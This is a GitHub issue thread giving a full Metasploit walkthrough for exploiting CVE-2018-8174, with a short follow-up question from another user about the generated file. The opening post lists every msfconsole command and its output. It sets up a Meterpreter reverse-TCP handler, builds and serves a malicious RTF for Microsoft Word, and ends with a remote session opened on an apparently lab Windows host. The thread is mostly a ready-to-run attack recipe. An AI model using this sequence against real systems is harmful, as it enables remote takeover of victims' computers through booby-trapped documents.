How To Use In Msf?
jas502n opened this issue · 1 comments
jas502n commented
0x01 Download CVE-2018-8174 To Kali Linux
root@kali:~# updatedb
root@kali:~# locate CVE-2018-8174.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/fileformat/CVE-2018-8174.rb
root@kali:~# locate CVE-2018-8174.rtf
/opt/metasploit-framework/embedded/framework/data/exploits/CVE-2018-8174.rtf
0x02 Listen port
root@kali:~# msfconsole
find: unknown predicate `-y'
=[ metasploit v4.16.50-dev- ]
+ -- --=[ 1752 exploits - 1003 auxiliary - 304 post ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/ha
use exploit/multi/hams/steamed use exploit/multi/handler
msf > use exploit/multi/ha
use exploit/multi/hams/steamed use exploit/multi/handler
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(multi/handler) > set lhost 10.10.10.103
lhost => 10.10.10.103
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.103     yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.10.103:4444
msf exploit(multi/handler) > netstat -ntpl
[*] exec: netstat -ntpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 726/postgres
tcp 0 0 10.10.10.103:4444 0.0.0.0:* LISTEN 18651/ruby
tcp 0 0 0.0.0.0:3391 0.0.0.0:* LISTEN 697/sshd
tcp6 0 0 :::80 :::* LISTEN 422/apache2
tcp6 0 0 ::1:3350 :::* LISTEN 699/xrdp-sesman
tcp6 0 0 ::1:5432 :::* LISTEN 726/postgres
tcp6 0 0 :::3389 :::* LISTEN 747/xrdp
tcp6 0 0 :::3391 :::* LISTEN 697/sshd
0x03 Use CVE-2018-8174-msf
msf exploit(multi/handler) > use exploit/windows/fileformat/CVE-2018-8174
msf exploit(windows/fileformat/CVE-2018-8174) > show options
Module options (exploit/windows/fileformat/CVE-2018-8174):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   /                yes       The URI path to use
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Office Word 32-bit
msf exploit(windows/fileformat/CVE-2018-8174) > set srvhost 10.10.10.103
srvhost => 10.10.10.103
msf exploit(windows/fileformat/CVE-2018-8174) > set uri
set urihost set uripath set uriport
msf exploit(windows/fileformat/CVE-2018-8174) > set urip
set uripath set uriport
msf exploit(windows/fileformat/CVE-2018-8174) > set uripath /exploit
uripath => /exploit
msf exploit(windows/fileformat/CVE-2018-8174) > show options
Module options (exploit/windows/fileformat/CVE-2018-8174):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.
   SRVHOST   10.10.10.103     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   /exploit         yes       The URI path to use
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Office Word 32-bit
msf exploit(windows/fileformat/CVE-2018-8174) > run
[*] Exploit running as background job 1.
msf exploit(windows/fileformat/CVE-2018-8174) >
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Using URL: http://10.10.10.103:8080/exploit
[*] Server started.
[*] 10.10.10.106 CVE-2018-8174 - Delivering Exploit
[*] Sending stage (179779 bytes) to 10.10.10.106
[*] Meterpreter session 1 opened (10.10.10.103:4444 -> 10.10.10.106:49318) at 2018-06-21 22:00:09 -0400
msf exploit(windows/fileformat/CVE-2018-8174) > sessions
Active sessions
===============
  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  CTF-PC\shaoyu @ CTF-PC  10.10.10.103:4444 -> 10.10.10.106:49318 (10.10.10.106)
msf exploit(windows/fileformat/CVE-2018-8174) >
qwert123677 commented
Hi! I need help!
For example, I've created an exploit called ms14_017.rtf and Metasploit should have created a file /root/msf4/local/msf.rtf
How can I access it, like move it to the desktop?